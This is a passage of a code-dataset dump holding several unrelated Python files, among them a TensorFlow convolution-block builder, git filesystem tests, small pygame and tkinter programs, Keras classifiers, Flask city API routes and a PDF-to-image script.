diff[1])\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"328179310","text":"\"\"\" Contains convolution layers \"\"\"\nimport logging\nimport numpy as np\nimport tensorflow as tf\n\nfrom .core import Dense, Dropout, AlphaDropout, BatchNormalization, Mip\nfrom .conv import Conv, ConvTranspose, SeparableConv, SeparableConvTranspose, DepthwiseConv, DepthwiseConvTranspose\nfrom .pooling import Pooling, GlobalPooling\nfrom .drop_block import Dropblock\nfrom .resize import ResizeBilinearAdditive, ResizeBilinear, ResizeNn, SubpixelConv\nfrom .layer import add_as_function\nfrom ...utils import unpack_args\n\n\nlogger = logging.getLogger(__name__)\n\n\n\n@add_as_function\nclass ConvBlock:\n \"\"\" Complex multi-dimensional block to apply sequence of different operations.\n\n Parameters\n ----------\n layout : str\n A sequence of letters, each letter meaning individual operation:\n\n - c - convolution\n - t - transposed convolution\n - C - separable convolution\n - T - separable transposed convolution\n - w - depthwise convolution\n - W - depthwise transposed convolution\n - f - dense (fully connected)\n - n - batch normalization\n - a - activation\n - p - pooling (default is max-pooling)\n - v - average pooling\n - P - global pooling (default is max-pooling)\n - V - global average pooling\n - d - dropout\n - D - alpha dropout\n - O - dropblock\n - m - maximum intensity projection (:class:`~.layers.Mip`)\n - b - upsample with bilinear resize\n - B - upsample with bilinear additive resize\n - N - upsample with nearest neighbors resize\n 
- X - upsample with subpixel convolution (:class:`~.layers.SubpixelConv`)\n - R - start residual connection\n - A - start residual connection with bilinear additive upsampling\n - `+` - end residual connection with summation\n - `*` - end residual connection with multiplication\n - `.` - end residual connection with concatenation\n\n Default is ''.\n\n filters : int\n Number of filters in the output tensor.\n kernel_size : int\n Kernel size.\n name : str\n Name of the layer that will be used as a scope.\n units : int\n Number of units in the dense layer.\n strides : int\n Default is 1.\n padding : str\n Padding mode, can be 'same' or 'valid'. Default - 'same'.\n data_format : str\n 'channels_last' or 'channels_first'. Default - 'channels_last'.\n dilation_rate: int\n Default is 1.\n activation : callable\n Default is `tf.nn.relu`.\n pool_size : int\n Default is 2.\n pool_strides : int\n Default is 2.\n pool_op : str\n Pooling operation ('max', 'mean', 'frac')\n dropout_rate : float\n Default is 0.\n factor : int or tuple of int\n Upsampling factor\n upsampling_layout : str\n Layout for upsampling layers\n is_training : bool or tf.Tensor\n Default is True.\n reuse : bool\n Whether to user layer variables if exist\n\n dense : dict\n Parameters for dense layers, like initializers, regularalizers, etc.\n conv : dict\n Parameters for convolution layers, like initializers, regularalizers, etc.\n transposed_conv : dict\n Parameters for transposed conv layers, like initializers, regularalizers, etc.\n batch_norm : dict or None\n Parameters for batch normalization layers, like momentum, intiializers, etc\n If None or inculdes parameters 'off' or 'disable' set to True or 1,\n the layer will be excluded whatsoever.\n pooling : dict\n Parameters for pooling layers, like initializers, regularalizers, etc.\n dropout : dict or None\n Parameters for dropout layers, like noise_shape, etc\n If None or inculdes parameters 'off' or 'disable' set to True or 1,\n the layer will be excluded whatsoever.\n dropblock : dict or None\n Parameters for dropblock layers, like dropout_rate, block_size, etc.\n subpixel_conv : dict or None\n Parameters for subpixel convolution like layout, activation, etc.\n resize_bilinear : dict or None\n Parameters for bilinear resize.\n resize_bilinear_additive : dict or None\n Parameters for bilinear additive resize like layout, activation, etc.\n\n Notes\n -----\n When ``layout`` includes several layers of the same type, each one can have its own parameters,\n if corresponding args are passed as lists (not tuples).\n\n Spaces may be used to improve readability.\n\n\n Examples\n --------\n A simple block: 3x3 conv, batch norm, relu, 2x2 max-pooling with stride 2::\n\n x = ConvBlock('cnap', filters=32, kernel_size=3)(x)\n\n A canonical bottleneck block (1x1, 3x3, 1x1 conv with relu in-between)::\n\n x = ConvBlock('nac nac nac', [64, 64, 256], [1, 3, 1])(x)\n\n A complex Nd block:\n\n - 5x5 conv with 32 filters\n - relu\n - 3x3 conv with 32 filters\n - relu\n - 3x3 conv with 64 filters and a spatial stride 2\n - relu\n - batch norm\n - dropout with rate 0.15\n\n ::\n\n x = ConvBlock('ca ca ca nd', [32, 32, 64], [5, 3, 3], strides=[1, 1, 2], dropout_rate=.15)(x)\n\n A residual block::\n\n x = ConvBlock('R nac nac +', [16, 16, 64], [1, 3, 1])(x)\n\n \"\"\"\n LETTERS_LAYERS = {\n 'a': 'activation',\n 'R': 'residual_start',\n '+': 'residual_end',\n '.': 'residual_end',\n '*': 'residual_end',\n 'f': 'dense',\n 'c': 'conv',\n 't': 'transposed_conv',\n 'C': 'separable_conv',\n 'T': 
'separable_conv_transpose',\n 'w': 'depthwise_conv',\n 'W': 'depthwise_conv_transpose',\n 'p': 'pooling',\n 'v': 'pooling',\n 'P': 'global_pooling',\n 'V': 'global_pooling',\n 'n': 'batch_norm',\n 'd': 'dropout',\n 'D': 'alpha_dropout',\n 'O': 'dropblock',\n 'm': 'mip',\n 'A': 'residual_bilinear_additive',\n 'b': 'resize_bilinear',\n 'B': 'resize_bilinear_additive',\n 'N': 'resize_nn',\n 'X': 'subpixel_conv'\n }\n\n LAYERS_CLASSES = {\n 'activation': None,\n 'residual_start': None,\n 'residual_end': None,\n 'dense': Dense,\n 'conv': Conv,\n 'transposed_conv': ConvTranspose,\n 'separable_conv': SeparableConv,\n 'separable_conv_transpose': SeparableConvTranspose,\n 'depthwise_conv': DepthwiseConv,\n 'depthwise_conv_transpose': DepthwiseConvTranspose,\n 'pooling': Pooling,\n 'global_pooling': GlobalPooling,\n 'batch_norm': BatchNormalization,\n 'dropout': Dropout,\n 'alpha_dropout': AlphaDropout,\n 'dropblock': Dropblock,\n 'mip': Mip,\n 'residual_bilinear_additive': None,\n 'resize_bilinear': ResizeBilinear,\n 'resize_bilinear_additive': ResizeBilinearAdditive,\n 'resize_nn': ResizeNn,\n 'subpixel_conv': SubpixelConv\n }\n\n DEFAULT_LETTERS = LETTERS_LAYERS.keys()\n LETTERS_GROUPS = dict(zip(DEFAULT_LETTERS, DEFAULT_LETTERS))\n LETTERS_GROUPS.update({\n 'C': 'c',\n 't': 'c',\n 'T': 'c',\n 'w': 'c',\n 'W': 'c',\n 'v': 'p',\n 'V': 'P',\n 'D': 'd',\n 'O': 'd',\n 'n': 'd',\n 'A': 'b',\n 'B': 'b',\n 'N': 'b',\n 'X': 'b',\n })\n\n def __init__(self, layout='',\n filters=0, kernel_size=3, strides=1, dilation_rate=1, depth_multiplier=1,\n activation=tf.nn.relu,\n pool_size=2, pool_strides=2,\n dropout_rate=0.,\n padding='same', data_format='channels_last', name=None,\n **kwargs):\n self.layout = layout\n self.filters, self.kernel_size, self.strides = filters, kernel_size, strides\n self.dilation_rate, self.depth_multiplier = dilation_rate, depth_multiplier\n self.activation = activation\n self.pool_size, self.pool_strides = pool_size, pool_strides\n self.dropout_rate = dropout_rate\n self.padding, self.data_format = padding, data_format\n self.name = name\n self.kwargs = kwargs\n\n\n def add_letter(self, letter, cls, name=None):\n \"\"\" Add custom letter to layout parsing procedure.\n\n Parameters\n ----------\n letter : str\n Letter to add.\n cls : class\n Tensor-processing layer. Must have layer-like signature (both init and call overloaded).\n name : str\n Name of parameter dictionary. 
Defaults to `letter`.\n\n Examples\n --------\n Add custom `Q` letter::\n\n block = ConvBlock('cnap Q', filters=32, custom_params={'key': 'value'})\n block.add_letter('Q', my_layer_class, 'custom_params')\n x = block(x)\n \"\"\"\n name = name or letter\n self.LETTERS_LAYERS.update({letter: name})\n self.LAYERS_CLASSES.update({name: cls})\n self.LETTERS_GROUPS.update({letter: letter})\n\n\n def __call__(self, inputs, training=None):\n layout = self.layout or ''\n layout = layout.replace(' ', '')\n if len(layout) == 0:\n logger.warning('ConvBlock: layout is empty, so there is nothing to do, just returning inputs.')\n return inputs\n\n # Getting `training` indicator from kwargs by its aliases\n if training is None:\n training = self.kwargs.get('is_training')\n if training is None:\n training = self.kwargs.get('training')\n\n context = None\n if self.name is not None:\n context = tf.variable_scope(self.name, reuse=self.kwargs.get('reuse'))\n context.__enter__()\n\n layout_dict = {}\n for letter in layout:\n letter_group = self.LETTERS_GROUPS[letter]\n letter_counts = layout_dict.setdefault(letter_group, [-1, 0])\n letter_counts[1] += 1\n\n tensor = inputs\n residuals = []\n for i, letter in enumerate(layout):\n # Arguments for layer creating; arguments for layer call\n args, call_args = {}, {}\n\n letter_group = self.LETTERS_GROUPS[letter]\n layer_name = self.LETTERS_LAYERS[letter]\n layer_class = self.LAYERS_CLASSES[layer_name]\n layout_dict[letter_group][0] += 1\n\n if letter == 'a':\n args = dict(activation=self.activation)\n activation_fn = unpack_args(args, *layout_dict[letter_group])['activation']\n if activation_fn is not None:\n tensor = activation_fn(tensor)\n elif letter == 'R':\n residuals += [tensor]\n elif letter == 'A':\n args = dict(factor=self.kwargs.get('factor'), data_format=self.data_format)\n args = unpack_args(args, *layout_dict[letter_group])\n t = self.LAYERS_CLASSES['resize_bilinear_additive'](**args, name='rba-%d' % i)(tensor)\n residuals += [t]\n elif letter == '+':\n tensor = tensor + residuals[-1]\n residuals = residuals[:-1]\n elif letter == '*':\n tensor = tensor * residuals[-1]\n residuals = residuals[:-1]\n elif letter == '.':\n axis = -1 if self.data_format == 'channels_last' else 1\n tensor = tf.concat([tensor, residuals[-1]], axis=axis, name='concat-%d' % i)\n residuals = residuals[:-1]\n else:\n layer_args = self.kwargs.get(layer_name, {})\n skip_layer = layer_args is False or \\\n isinstance(layer_args, dict) and layer_args.get('disable', False)\n\n # Create params for the layer call\n if skip_layer:\n pass\n elif letter in self.DEFAULT_LETTERS:\n args = {param: getattr(self, param, self.kwargs.get(param, None))\n for param in layer_class.params\n if (hasattr(self, param) or param in self.kwargs)}\n else:\n if letter not in self.LETTERS_LAYERS.keys():\n raise ValueError('Unknown letter symbol - %s' % letter)\n\n # Additional params for some layers\n if letter_group == 'd':\n # Layers that behave differently during train/test\n call_args.update({'training': training})\n elif letter_group.lower() == 'p':\n # Choosing pooling operation\n pool_op = 'mean' if letter.lower() == 'v' else self.kwargs.pop('pool_op', 'max')\n args['op'] = pool_op\n elif letter_group == 'b':\n # Additional layouts for all the upsampling layers\n if self.kwargs.get('upsampling_layout'):\n args['layout'] = self.kwargs.get('upsampling_layout')\n\n if not skip_layer:\n args = {**args, **layer_args}\n args = unpack_args(args, *layout_dict[letter_group])\n\n with 
tf.variable_scope('layer-%d' % i):\n tensor = layer_class(**args)(tensor, **call_args)\n\n # Allows to easily get output from graph by name\n tensor = tf.identity(tensor, name='_output')\n\n if context is not None:\n context.__exit__(None, None, None)\n\n return tensor\n\n\ndef update_layers(letter, func, name=None):\n \"\"\" Add custom letter to layout parsing procedure.\n\n Parameters\n ----------\n letter : str\n Letter to add.\n func : class\n Tensor-processing layer. Must have layer-like signature (both init and call overloaded).\n name : str\n Name of parameter dictionary. Defaults to `letter`.\n\n Examples\n --------\n Add custom `Q` letter::\n\n block = ConvBlock('cnap Q', filters=32, custom_params={'key': 'value'})\n block.add_letter('Q', my_func, 'custom_params')\n x = block(x)\n \"\"\"\n name = name or letter\n ConvBlock.LETTERS_LAYERS.update({letter: name})\n ConvBlock.LAYERS_CLASSES.update({name: func})\n ConvBlock.LETTERS_GROUPS.update({letter: letter})\n\n\n\n@add_as_function\nclass Upsample:\n \"\"\" Upsample inputs with a given factor.\n\n Parameters\n ----------\n factor : int\n An upsamping scale\n shape : tuple of int\n Shape to upsample to (used by bilinear and NN resize)\n layout : str\n Resizing technique, a sequence of:\n\n - A - use residual connection with bilinear additive upsampling\n - b - bilinear resize\n - B - bilinear additive upsampling\n - N - nearest neighbor resize\n - t - transposed convolution\n - T - separable transposed convolution\n - X - subpixel convolution\n\n all other :class:`.ConvBlock` layers are also allowed.\n\n Examples\n --------\n A simple bilinear upsampling::\n\n x = upsample(shape=(256, 256), layout='b')(x)\n\n Upsampling with non-linear normalized transposed convolution::\n\n x = Upsample(factor=2, layout='nat', kernel_size=3)(x)\n\n Subpixel convolution with a residual bilinear additive connection::\n\n x = Upsample(factor=2, layout='AX+')(x)\n \"\"\"\n def __init__(self, factor=None, shape=None, layout='b', name='upsample', **kwargs):\n self.factor, self.shape, self.layout = factor, shape, layout\n self.name, self.kwargs = name, kwargs\n\n def __call__(self, inputs, *args, **kwargs):\n if np.all(self.factor == 1):\n return inputs\n\n if 't' in self.layout or 'T' in self.layout:\n if 'kernel_size' not in self.kwargs:\n self.kwargs['kernel_size'] = self.factor\n if 'strides' not in kwargs:\n self.kwargs['strides'] = self.factor\n\n return ConvBlock(self.layout, factor=self.factor, shape=self.shape,\n name=self.name, **self.kwargs)(inputs, *args, **kwargs)\n","sub_path":"batchflow/batchflow/models/tf/layers/conv_block.py","file_name":"conv_block.py","file_ext":"py","file_size_in_byte":15960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564349900","text":"import os.path\nimport subprocess\n\nfrom gitviewfs_objects import TreeDirItem\nfrom tests.structs.shallow import paths\nfrom tests.structs.shallow.utils import BaseDefaultDirStructTest,\\\n\tBaseDefaultDirStructIntegrationTest\n\n\nclass TreeDirItemPathTest(BaseDefaultDirStructTest):\n\t\n\tdef test_path(self):\n\t\tself.assertPathIs(paths.TREE_DIR_ITEM, TreeDirItem)\n\t\n\t\nclass TreeDirItemIntegrationTest(BaseDefaultDirStructIntegrationTest):\n\t\n\tdef test_tree_dir_items_are_symbolic_links(self):\n\t\tfilename, subdirname = self.create_and_commit_file_and_subdir()\n\t\ttree_sha1 = subprocess.check_output(['git', 'rev-parse', 'HEAD^{tree}'])\n\t\ttree_sha1 = tree_sha1.strip()\n\t\t\n\t\tfile_path = 
self.make_tree_dir_item_path(tree_sha1, filename)\n\t\tsubdir_path = self.make_tree_dir_item_path(tree_sha1, subdirname)\n\t\t\n\t\tself.assertTrue(os.path.islink(file_path))\n\t\tself.assertTrue(os.path.islink(subdir_path))\n\t\n\tdef test_readlink_file(self):\n\t\tfilename, _ = self.create_and_commit_file_and_subdir()\n\t\ttree_sha1 = subprocess.check_output(['git', 'rev-parse', 'HEAD^{tree}']).strip()\n\t\tfile_sha1 = subprocess.check_output(['git', 'hash-object', filename]).strip()\n\t\t\n\t\titem_path = self.make_tree_dir_item_path(tree_sha1, filename)\n\t\t\n\t\tself.assertSymLink(self.make_blob_file_path(file_sha1), item_path)\n\t\n\tdef test_readlink_dir(self):\n\t\t_, subdirname = self.create_and_commit_file_and_subdir()\n\t\ttree_sha1 = subprocess.check_output(['git', 'rev-parse', 'HEAD^{tree}']).strip()\n\t\ttree_subdir_item = subprocess.check_output('git cat-file -p ' + tree_sha1 + ' | grep ' + subdirname, shell=True).strip()\n\t\ttab_pos = tree_subdir_item.index('\\t')\n\t\tsubdir_sha1 = tree_subdir_item[: tab_pos].split(' ')[2]\n\t\t\n\t\titem_path = self.make_tree_dir_item_path(tree_sha1, subdirname)\n\t\t\n\t\tself.assertSymLink(self.make_tree_dir_path(subdir_sha1), item_path)\n","sub_path":"tests/structs/shallow/test_tree_dir_item.py","file_name":"test_tree_dir_item.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"88855992","text":"# --OPTION--\n\n# on definit les constantes\nWIDTH = 1504\nHEIGHT = 896\nFPS = 60\nTITLE = \"plateforme\"\nFONT_NAME = '04B_30__'\nRANGER_SPRITESHEET = \"Ranger-M.png\"\nENVRNMT_SPRITESHEET = \"sheet.png\"\nDAGGER_SPRITESHEET = \"gear_daggers.png\"\n\n# Physique du joueur\nPLAYER_ACC = 0.8\nPLAYER_FRICTION = -0.09\nPLAYER_GRAV = 0.8\nPLAYER_JUMP = 25\n\n# Couleurs\nWHITE = (255,255,255)\nBLACK = (0,0,0)\nRED = (255,0,0)\nGREEN = (0,255,0)\nBLUE = (0,0,255)\nYELLOW = (255,255,0)\nLIGHTBLUE = (0, 155, 155)\nBGCOLOR = LIGHTBLUE\nDAGGER_BG = (184, 2, 227)\n\n# arme\nRANGE_CAILLOU = 250\nVIT_CAILLOU = 10\nDAGGER1_RANGE = 350\nDAGGER1_VIT = 20\n\n# ennemi\nSERPENT_VIT = 0.5\nLIM_X_SERPENT = 200\nFRICTION_SERPENT = -0.09\n","sub_path":"constantes.py","file_name":"constantes.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534454490","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\nfrom matplotlib.widgets import TextBox\n\nfig = plt.figure()\nfig.set_dpi(100)\nfig.set_size_inches(6, 6)\n\nRb = 9\nrm = 1\n\nax = plt.axes(xlim=(-Rb-1, Rb+1), ylim=(-Rb-1, Rb+1))\npatch = plt.Circle((0, 0), rm, fill=False, fc='y')\nmain_circle = plt.Circle((0, 0), Rb, fill=False, fc='y')\nax.add_patch(main_circle)\n\n\ndef init():\n patch.center = (0, 0)\n ax.add_patch(patch)\n return patch,\n\ndef animate(i):\n x, y = patch.center\n x = (Rb-rm) * np.sin(np.radians(i))\n y = (Rb-rm) * np.cos(np.radians(i))\n patch.center = (x, y)\n return patch,\n\ndef animate2(i, Rb, rm):\n x, y = patch.center\n x = (Rb-rm) * np.sin(np.radians(i))\n y = (Rb-rm) * np.cos(np.radians(i))\n patch.center = (x, y)\n return patch,\n\nanim = animation.FuncAnimation(fig, animate2,\n fargs=(Rb, rm),\n init_func=init,\n frames=360,\n interval=1,\n blit=False)\n\ndef submit(text):\n Rb = int(text.split(',')[0])\n rm = int(text.split(',')[1])\n print(Rb, rm)\n # ax = plt.axes(xlim=(-Rb-1, Rb+1), ylim=(-Rb-1, Rb+1))\n ax.set_xlim(-Rb-1, Rb+1)\n 
ax.set_ylim(-Rb-1, Rb+1)\n main_circle.set_radius(Rb)\n patch.set_radius(rm)\n\n plt.draw()\n\n anim.__init__(fig, animate2, fargs=(Rb, rm),\n init_func=init,\n frames=360,\n interval=1,\n blit=False)\n anim.frame_seq = anim.new_frame_seq()\n anim.event_source.start()\n\naxbox = plt.axes([0.11, 0.90, 0.08, 0.08])\ntext_box = TextBox(axbox, 'R, r = ')\ntext_box.on_submit(submit)\n\nplt.show()","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147301814","text":"\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy import stats\nimport numpy as np\nimport pandas as pd\n\ndef Label_encode(data):\n \"\"\"\n This function is used to label encode comment and author names (inplace). This is used now but can be\n substituted by the function in Features directory which maps to numeric values.\n\n :param data: Training data (type - pandas.DataFrame)\n :return: None\n \"\"\"\n\n lb_make = LabelEncoder()\n data[\"comment\"] = lb_make.fit_transform(data[\"comment\"])\n data[\"author\"] = lb_make.fit_transform(data[\"author\"])\n\n data.reset_index(drop=True, inplace=True)\n\n return\n\n\ndef remove_non_numeric_data(data):\n \"\"\"\n This function is used to remove non-numeric data (inplace) which might be present (quite rare) in\n the column intended for numeric data.\n\n :param data: The training data (type - pandas.DataFrame)\n :return: None\n \"\"\"\n del_ind = []\n for row_num in range(data.shape[0]):\n ele = data[\"changed files\"].iloc[row_num]\n if ele == \" \":\n data[\"changed files\"].iloc[row_num] = 0\n elif not str(ele).isdigit():\n del_ind.append(row_num)\n print(\"Number of non numeric instances removed\", len(del_ind))\n data.drop(del_ind, inplace=True)\n data['changed files'] = pd.to_numeric(data['changed files'])\n return\n\n\ndef removing_outliers(data):\n \"\"\"\n This function is used to remove any outliers in the data. 
They generally emerge from the commit by bots\n which tend to have a very large number of lines added due to formatting.\n\n :param data: the DataFrame containing the attributes an dthe target variable\n :return: None\n \"\"\"\n\n print(data.info())\n z = np.abs(stats.zscore(data))\n threshold = 3\n\n indexes, rows = np.where(z > threshold)\n indexes = list(set(indexes))\n\n # print(len(indexes))\n z, o = 0, 0\n\n for i in indexes:\n if data[\"buggy\"].iloc[i] == 0:\n z += 1\n else:\n o += 1\n orig_rows = data.shape[0]\n\n for ind in indexes:\n data.drop(ind, inplace=True)\n\n print(\"Number of instances removed : \", orig_rows - data.shape[0])\n\n return","sub_path":"Training/Pre_processing.py","file_name":"Pre_processing.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"13299418","text":"from tkinter import *\r\n\r\nwindow=Tk()\r\ndef converter():\r\n grams=float(e1_value.get())*1000\r\n pounds=float(e1_value.get())*2.20462\r\n ounces=float(e1_value.get())*35.274\r\n t1.delete(\"1.0\", END)\r\n t1.insert(END, grams)\r\n t2.delete(\"1.0\", END)\r\n t2.insert(END, pounds)\r\n t3.delete(\"1.0\", END)\r\n t3.insert(END, ounces)\r\n\r\nb1=Button(window, text=\"Convert\", command=converter)\r\nb1.grid(row=0, column=2)\r\n\r\ne0=Label(window, text=\"Kilogram\")\r\ne0.grid(row=0, column=1)\r\n\r\ne2=Label(window, text=\"Grams\")\r\ne2.grid(row=1, column=0)\r\n\r\ne3=Label(window, text=\"Pounds\")\r\ne3.grid(row=1, column=1)\r\n\r\ne4=Label(window, text=\"Ounces\")\r\ne4.grid(row=1, column=2)\r\n\r\ne1_value=StringVar()\r\ne1=Entry(window, textvariable=e1_value)\r\ne1.grid(row=0, column=1, columnspan=2)\r\n\r\nt1=Text(window, height=1, width=25)\r\nt1.grid(row=2, column=0)\r\n\r\nt2=Text(window, height=1, width=25)\r\nt2.grid(row=2, column=1)\r\n\r\nt3=Text(window, height=1, width=25)\r\nt3.grid(row=2, column=2)\r\n\r\nwindow.mainloop()","sub_path":"MP.TkinterConverter/script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"293150709","text":"# Keras Implementation\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.optimizers import SGD, Adam\n\ndef MLNN(X_train, y_train):\n model = Sequential()\n # Dense(64) is a fully-connected layer with 64 hidden units.\n # in the first layer, you must specify the expected input data shape:\n # here, 20-dimensional vectors.\n model.add(Dense(64, activation='relu', input_dim=500))\n model.add(Dropout(0.5))\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n\n model.add(Dense(4, activation='softmax'))\n\n adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n\n model.compile(loss='categorical_crossentropy',\n optimizer=adam,\n metrics=['accuracy'])\n\n model.fit(X_train, y_train, epochs=150, batch_size=128)\n\n return model\n\n\n# Logistic Regression Implementation\nfrom sklearn.linear_model import LogisticRegression\ndef LR(X_train, y_train):\n model = LogisticRegression()\n model.fit(X_train, y_train)\n\n return model\n","sub_path":"src/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249859620","text":"import pygame\nfrom Player import 
Player\n\npygame.init()\npygame.font.init()\n\npygame.display.set_caption('Rainfun Platformer')\n#pygame.display.set_icon(pygame.image.load(r'Resources\\Enemies\\ship\\idle.png'))\n\nclock = pygame.time.Clock()\nmyfont = pygame.font.SysFont('freesans', 30)\nrunning = True\nsW = 1024\nsH = 768\nscreen = pygame.display.set_mode((sW, sH))\n\nBLACK = (0, 0, 0)\nbackground = pygame.Surface(screen.get_size())\nplayer = Player(50, 50, 'Resources/Player.png', sW, sH)\n\n\n\ndef start():\n loop()\n cleanUp()\n\ndef loop():\n global running\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n player.update()\n render()\n clock.tick(30)\n\ndef render():\n screen.fill(BLACK)\n player.render(screen)\n pygame.display.flip()\n\n\n\ndef cleanUp():\n pygame.quit()\n\n\nstart()\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519467509","text":"#!/usr/bin/python3\n\"\"\"\nModule for methods used by app_view blueprint\n\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, make_response, request, abort\nfrom models import storage\nfrom models.city import City\nfrom models.state import State\nfrom flasgger import swag_from\n\n\n@app_views.route('/states//cities', methods=['GET'],\n strict_slashes=False)\n@swag_from('swagger_spec/get_cities.yml')\ndef get_cities_by_state(state_id):\n \"\"\"Retrieves the list of all City objects from a given State\"\"\"\n state_list = list(storage.all(State).values())\n state = [state for state in state_list if state.id == state_id]\n if len(state) == 0:\n abort(404)\n cities = state[0].cities\n cities = [city.to_dict() for city in cities]\n return jsonify(cities)\n\n\n@app_views.route('/cities/', methods=['GET'], strict_slashes=False)\n@swag_from('swagger_spec/get_city.yml')\ndef get_city(city_id):\n \"\"\"Retrieves a City object\"\"\"\n city_obj = storage.get(City, city_id)\n if city_obj is None:\n abort(404)\n return jsonify(city_obj.to_dict())\n\n\n@app_views.route('states//cities', methods=['POST'],\n strict_slashes=False)\n@swag_from('swagger_spec/create_city.yml')\ndef create_city(state_id):\n \"\"\"Creates a new State object\"\"\"\n data = request.get_json()\n if type(data) is not dict:\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n if 'name' not in data:\n return make_response(jsonify({'error': 'Missing name'}), 400)\n state_obj = storage.get(State, state_id)\n if state_obj is None:\n abort(404)\n new_obj = City()\n for key, value in data.items():\n if key != 'id' and key != 'created_at' and key != 'updated_at':\n setattr(new_obj, key, value)\n setattr(new_obj, 'state_id', state_id)\n new_obj.save()\n return make_response(jsonify(new_obj.to_dict()), 201)\n\n\n@app_views.route('/cities/', methods=['DELETE'],\n strict_slashes=False)\n@swag_from('swagger_spec/delete_city.yml')\ndef delete_city(city_id):\n \"\"\"Deletes a City object\"\"\"\n city_obj = storage.get(City, city_id)\n if city_obj is None:\n abort(404)\n city_obj.delete()\n storage.save()\n return jsonify({})\n\n\n@app_views.route('/cities/', methods=['PUT'], strict_slashes=False)\n@swag_from('swagger_spec/update_city.yml')\ndef update_city(city_id):\n \"\"\"Updates a City object\"\"\"\n city_obj = storage.get(City, city_id)\n if city_obj is None:\n abort(404)\n data = request.get_json()\n if type(data) is not dict:\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n for key, 
value in data.items():\n if key != 'id' and key != 'created_at' and key != 'updated_at':\n setattr(city_obj, key, value)\n city_obj.save()\n return jsonify(city_obj.to_dict())\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"362814433","text":"from pdf2image import convert_from_path\nimport os\nimport sys\n\n\ndef pdf2image(_in, _out_folder):\n if os.path.exists(_out_folder) is False:\n os.makedirs(_out_folder)\n convert_from_path(_in, output_folder=_out_folder, fmt='jpg',\n first_page=1, last_page=100)\n\n\ndef read_file():\n temp_dict = {}\n with open('files.txt', 'r', encoding='utf8') as f:\n for line in f.readline():\n key, name = line.split(',')\n temp_dict[key] = name\n return temp_dict\n\n\nif __name__ == '__main__':\n _in, _out = sys.argv[1:]\n temp_dict = read_file()\n for file in os.listdir(_in):\n name = temp_dict.get(file)\n path = os.path.join(_in, name)\n pdf2image(path, _out)\n print(path)\n","sub_path":"image_to_pdf/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30482622","text":"import logging\n\nfrom Problem_1.src.helper_classes.Exceptions import NotAStringException, FileNotFoundException\nfrom Problem_1.src.validator_classes.FilePathValidator import FilePathValidator\nfrom Problem_1.src.validator_classes.StringValidator import StringValidator\n\n\nclass InputFile:\n # konstruktor\n def __init__(self, file_path = None):\n self._loaded_file = None\n self._init_logging_module()\n\n if file_path != None:\n self.load_file(file_path)\n\n\n # ładuje plik z podanej sciezki\n def load_file(self, file_path):\n if self._is_file_path(file_path):\n self._loaded_file = open(file_path, 'r')\n else:\n logging.info(\"File couldn't be loaded\")\n\n # szuka stringa w pliku i zwraca liczbe jego wystapien\n def search_string(self, string_to_search):\n if not self._is_string(string_to_search) or not self._is_file_loaded():\n return None\n\n string_count = 0\n text_line = self._loaded_file.readline()\n\n while text_line != '':\n string_count += text_line.count(string_to_search)\n text_line = self._loaded_file.readline()\n\n return string_count\n\n # inicjuj moduł loggujący\n def _init_logging_module(self):\n logging.basicConfig(filename=\"InputFile_class_log.log\",\n filemode='a',\n format='%(asctime)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.DEBUG)\n\n # sprawdza czy zostal zaladowany plik\n def _is_file_loaded(self):\n if self._loaded_file != None:\n return True\n else:\n logging.info(\"File not loaded\")\n return False\n\n # sprawdza czy podana zmienna jest stringiem\n def _is_string(self, variable_to_check):\n validator = StringValidator()\n\n try:\n validator.validate(variable_to_check)\n except NotAStringException:\n logging.info(\"Value Passed is not a string\")\n return False\n\n return True\n\n # sprawdza czy mozna otworzyc plk\n def _is_file_path(self, file_path):\n validator = FilePathValidator()\n\n try:\n validator.validate(file_path)\n except NotAStringException:\n logging.info(\"Value passed is not a string\")\n return False\n except FileNotFoundException:\n logging.info(\"File not found under specified path\")\n return False\n\n return 
